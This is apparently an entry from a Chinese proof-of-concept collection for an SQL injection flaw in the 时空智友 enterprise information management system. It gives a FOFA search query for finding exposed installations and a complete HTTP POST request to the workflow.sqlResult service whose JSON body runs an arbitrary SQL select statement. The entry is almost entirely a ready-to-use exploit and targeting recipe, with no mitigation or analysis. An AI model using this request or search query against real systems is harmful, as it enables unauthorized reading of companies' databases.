漏洞名称
时空智友企业信息管理系统 SQL注入漏洞

fofa语法
body="时空智友企业信息"

POC
执行select查询结果
POST /formservice?service=workflow.sqlResult HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 51
{"params": {"a": "1"}, "sql": "select 12498"}